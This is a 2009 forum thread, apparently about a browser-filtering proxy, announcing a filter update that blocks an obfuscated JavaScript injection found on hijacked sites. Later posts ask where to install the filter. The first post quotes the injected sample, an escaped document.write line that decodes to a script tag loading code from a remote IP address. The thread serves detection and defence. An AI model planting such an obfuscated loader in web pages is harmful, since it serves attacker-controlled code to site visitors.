Bugfix + 0day: JS Kill - Specific Escaped Code
|
Apr. 01, 2009, 09:25 PM
Post: #1
|
|||
|
|||
Bugfix + 0day: JS Kill - Specific Escaped Code
Two changes:
- Global variable "a" wasn't always reset, resulting in odd (but harmless) secondary effects. - I came across two sites today containing code (pointing to a Latvian server) like: Code: document.write(unescape('%3Cscrz7RiKQpt%20srK7c%3D%2F%2F94%2E247cMV%2E6xE2Hsh%2E1z7R93N5z7R%2FfIejq3Nuery%2Ejz7RsK7%3E3N%3C%2FsfIecriz7Rpt3N%3E').replace(/K7|fIe|cMV|z7R|KQ|Hsh|6xE|3N|NK/g,"")); If the new subroutine matches, you'll get a Log-Rare entry like: Code: WEB JS_Escape replace http://my-hijacked-site.com/ Let me know of any false positives. Code: [Patterns] |
|||
Apr. 02, 2009, 01:15 AM
Post: #2
|
|||
|
|||
RE: Bugfix + 0day: JS Kill - Specific Escaped Code
where do i put the filter?
under JS intercept? |
|||
Apr. 02, 2009, 01:34 AM
(This post was last modified: Apr. 02, 2009 01:39 AM by sidki3003.)
Post: #3
|
|||
|
|||
RE: Bugfix + 0day: JS Kill - Specific Escaped Code
Dang, as mentioned above, it's an update.
So, look for the previous version, untick it, place the new version above it, save the config. |
|||
Apr. 02, 2009, 02:31 AM
Post: #4
|
|||
|
|||
RE: Bugfix + 0day: JS Kill - Specific Escaped Code
oh bugger. My apology!
|
|||
« Next Oldest | Next Newest »
|